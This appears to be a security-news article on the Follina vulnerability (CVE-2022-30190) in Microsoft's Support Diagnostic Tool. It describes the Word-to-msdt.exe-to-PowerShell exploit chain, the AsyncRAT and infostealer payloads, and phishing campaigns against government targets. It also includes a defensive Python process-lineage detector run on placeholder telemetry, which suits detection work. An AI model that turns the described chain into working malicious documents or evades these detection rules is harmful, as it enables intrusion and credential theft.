On May 27, 2022, the public became aware of a remote code execution (RCE) vulnerability, known as Follina. Soon after its disclosure, experts observed several instances of exploitation.

Follina (CVE-2022-30190) is a vulnerability identified in the Microsoft Support Diagnostic Tool (MSDT), enabling RCE on all susceptible systems. The exploitation occurs via the ms-msdt protocol handler scheme.

To exploit Follina successfully, threat actors don’t require the use of macros to entice victims. Instead, they deploy a specially crafted Word Document.

This document, through Word’s template feature, downloads and loads a malicious HTML file. Consequently, threat actors gain the ability to execute PowerShell code within targeted Windows systems.

Microsoft has issued multiple workarounds and advisories to mitigate the vulnerability’s risk.

Functioning of the Follina Vulnerability

Upon the dissemination of this vulnerability’s details online, threat actors eagerly commenced the installation of their payloads.

For a successful Follina exploit, threat actors employ HTML documents executed under WinWord. The execution initiates the msdt.exe process as a child process.


A protocol handler entry in the registry enables this process chain. Subsequently, Sdiagnhost.exe, the Scripted Diagnostics Native Host, is activated; it facilitates the creation of the final payload, which in Follina’s case is PowerShell.
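The Office-to-msdt.exe process chain described here, together with the behavior-based detection mentioned in the zero-day section of the previous post, can be turned into a simple process-lineage check over endpoint telemetry. The Python below is an added example, not code from Gridinsoft, Microsoft or the researchers cited; the process records, PIDs and command lines are constructed to resemble Sysmon-style process-creation events, and the placeholder values in them (CONSTRUCTED_PLACEHOLDER, CONSTRUCTED_STAGE2) are not real exploit strings. One practical caveat is built in: in practice sdiagnhost.exe is started by the DCOM service host rather than as a direct child of msdt.exe, so the rule treats it as the parent of a shell instead of expecting one unbroken lineage back to Word.

```python
"""Process-lineage detection for the Follina-style chain (added example)."""
from dataclasses import dataclass
from typing import Dict, List

# Process names the page discusses (winword, msdt.exe, sdiagnhost.exe, PowerShell),
# widened to the other common Office hosts and shells. Assumed lists, not a vendor rule.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record, modelled on Sysmon Event ID 1 fields."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_follina_chain(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per matching rule. Three rules, each a defender-side signal:
    1. an Office application directly spawning msdt.exe (the page's first observation);
    2. msdt.exe launched with the ms-msdt: protocol scheme on its command line;
    3. a shell whose parent is sdiagnhost.exe (the Scripted Diagnostics Native Host).
    Rule 3 deliberately does not require Office ancestry, because sdiagnhost.exe is
    normally launched via the DCOM service host rather than by msdt.exe itself."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[dict] = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""
        if name == "msdt.exe" and parent_name in OFFICE_APPS:
            findings.append({"rule": "office_spawns_msdt", "pid": e.pid, "parent": parent_name})
        if name == "msdt.exe" and "ms-msdt:" in e.cmdline.lower():
            findings.append({"rule": "msdt_protocol_scheme", "pid": e.pid, "cmdline": e.cmdline})
        if name in SHELLS and parent_name == "sdiagnhost.exe":
            findings.append({"rule": "sdiagnhost_spawns_shell", "pid": e.pid, "parent": parent_name})
    return findings


# Constructed telemetry: a suspicious chain (PIDs 100-400) plus two benign launches (500, 600).
SAMPLE_EVENTS = [
    ProcEvent(4, 0, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    ProcEvent(10, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(100, 10, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              '"WINWORD.EXE" /n invoice.docx'),
    # Word spawning the diagnostic tool with the protocol scheme (placeholder argument)
    ProcEvent(200, 100, r"C:\Windows\System32\msdt.exe", "msdt.exe ms-msdt:/id CONSTRUCTED_PLACEHOLDER"),
    # Scripted Diagnostics host comes up under DCOM, then launches PowerShell
    ProcEvent(300, 4, r"C:\Windows\System32\sdiagnhost.exe", "sdiagnhost.exe -Embedding"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command CONSTRUCTED_STAGE2"),
    # Benign: an administrator opens PowerShell from Explorer
    ProcEvent(500, 10, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    # Benign: a user starts a troubleshooter interactively (no ms-msdt: scheme, no Office parent)
    ProcEvent(600, 10, r"C:\Windows\System32\msdt.exe", "msdt.exe"),
]


if __name__ == "__main__":
    for finding in detect_follina_chain(SAMPLE_EVENTS):
        print(finding)
```

Running the block prints three findings, all for PIDs 200 and 400; the two benign launches produce none. In a real deployment the same three checks map directly onto EDR or Sysmon process-creation telemetry, and the third rule is the one that survives when the document-delivery step is replaced by another trigger, as the page goes on to note.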

AsyncRAT and Browser Infostealer via Follina Vulnerability

It has been observed that threat actors deployed a diverse range of payloads in successful exploitation instances. One instance involved deploying the remote access Trojan AsyncRAT, complete with a valid digital signature.


Upon execution, this trojan verifies the presence of antivirus software. However, its primary function is to gather various system information, such as operating system details, executed paths, usernames, and hardware identification, and transmit it to a command-and-control (C&C) server.


Once its task is complete, the malware awaits further commands from the C&C server and executes them on the compromised system.

Another payload instance was a browser infostealer, targeting various browser data such as saved login credentials and cookies from browsers like Edge, Chrome, and Firefox.

Patching the Follina Vulnerability

While most exploits of the vulnerability occur through malicious documents, researchers have discovered alternative methods enabling successful Follina exploitation, including manipulation of HTML content in network traffic.

“While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” said Tom Hegel, senior threat researcher at security firm SentinelOne. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.”

The Follina flaw was initially noticed in August 2020 by an undergraduate researcher and reported to Microsoft on April 21. The company has proposed mitigations, including using Microsoft Defender Antivirus for monitoring and blocking exploitation and disabling a specific protocol within the Support Diagnostic Tool.


Microsoft acknowledged that the vulnerability has been exploited and has already patched the issue. However, the company is yet to classify the vulnerability as a ‘zero-day’ or previously unknown vulnerability.

APT actors utilizing the vulnerability

More alarmingly, the Follina vulnerability has been observed as part of longer infection chains. For example, security firm Proofpoint observed Chinese APT actor TA413 sending malicious URLs disguised as emails from the Central Tibetan Administration.

The vulnerability has been employed at different stages in threat actor infection chains, depending on the tactics and toolkits used.


It has been used against numerous targets in Nepal, Belarus, the Philippines, India, and Russia. Proofpoint’s vice president of threat research, Sherrod DeGrippo, identified multiple instances of vulnerability exploitation within phishing campaigns.

The vulnerability affects all supported Windows versions, Office ProPlus, Office 2021, Office 2013 through 2019, and Microsoft Office 365, receiving a 7.8 CVSS score.

Government workers impacted by the vulnerability

In addition to targeting various entities across different countries, specialists report attacks on government workers leveraging this vulnerability.

State-sponsored hackers attempted to exploit the Follina vulnerability in Microsoft Office against U.S. and E.U. government targets through a phishing campaign.

So far, researchers have not identified which government was behind the attack.

Emails sent in a phishing campaign to government workers

The campaign’s malicious emails contained fake recruitment pitches promising a 20 percent salary increase. To learn more, recipients were urged to open the accompanying email attachment.

Sherrod DeGrippo, vice president of threat research at Proofpoint, tweeted about a similar incident in which about 10 of the company’s customers received over 1,000 messages with the same text.
